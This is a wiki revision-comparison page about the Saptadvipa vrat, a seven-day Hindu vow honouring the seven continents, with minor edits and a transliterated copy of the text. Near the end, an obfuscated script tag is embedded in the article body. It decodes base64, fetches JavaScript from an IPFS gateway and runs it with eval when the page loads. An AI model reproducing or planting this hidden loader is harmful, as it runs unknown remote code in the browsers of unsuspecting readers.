Difference between revisions of "सप्तद्वीप व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[चैत्र]] [[शुक्ल पक्ष]] [[प्रतिपदा]] से प्रारम्भ करना चाहिए।  
 
*यह व्रत [[चैत्र]] [[शुक्ल पक्ष]] [[प्रतिपदा]] से प्रारम्भ करना चाहिए।  
 
*सात दिनों तक क्रम से सात द्वीपों, यथा– जम्बू, शाक (शकों का), कुश, क्रौंच, शाल्मलि, गोमेद एवं पुष्कर की पूजा, घी से होम करना चाहिए।  
 
*सात दिनों तक क्रम से सात द्वीपों, यथा– जम्बू, शाक (शकों का), कुश, क्रौंच, शाल्मलि, गोमेद एवं पुष्कर की पूजा, घी से होम करना चाहिए।  
 
*सात धान्यों का दान करना चाहिए। नक्त विधि एवं भूमि पर शयन, एक वर्ष तक करना चाहिए।
 
*सात धान्यों का दान करना चाहिए। नक्त विधि एवं भूमि पर शयन, एक वर्ष तक करना चाहिए।
*चाँदी से बने द्वीपों की आकृति का दान करना चाहिए।  
+
*[[चाँदी]] से बने द्वीपों की आकृति का दान करना चाहिए।  
 
*कल्पान्त तक स्वर्ग को जाता है।<ref>विष्णुधर्मोत्तरपुराण (3|159|197)।</ref>
 
*कल्पान्त तक स्वर्ग को जाता है।<ref>विष्णुधर्मोत्तरपुराण (3|159|197)।</ref>
 
 
 
 
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 05:38, 9 February 2012

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat chaitr shukl paksh pratipada se prarambh karana chahie.
  • sat dinoan tak kram se sat dvipoan, yatha– jamboo, shak (shakoan ka), kush, krauanch, shalmali, gomed evan pushkar ki pooja, ghi se hom karana chahie.
  • sat dhanyoan ka dan karana chahie. nakt vidhi evan bhoomi par shayan, ek varsh tak karana chahie.
  • chaandi se bane dvipoan ki akriti ka dan karana chahie.
  • kalpant tak svarg ko jata hai.[1]

  <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|159|197).

sanbandhit lekh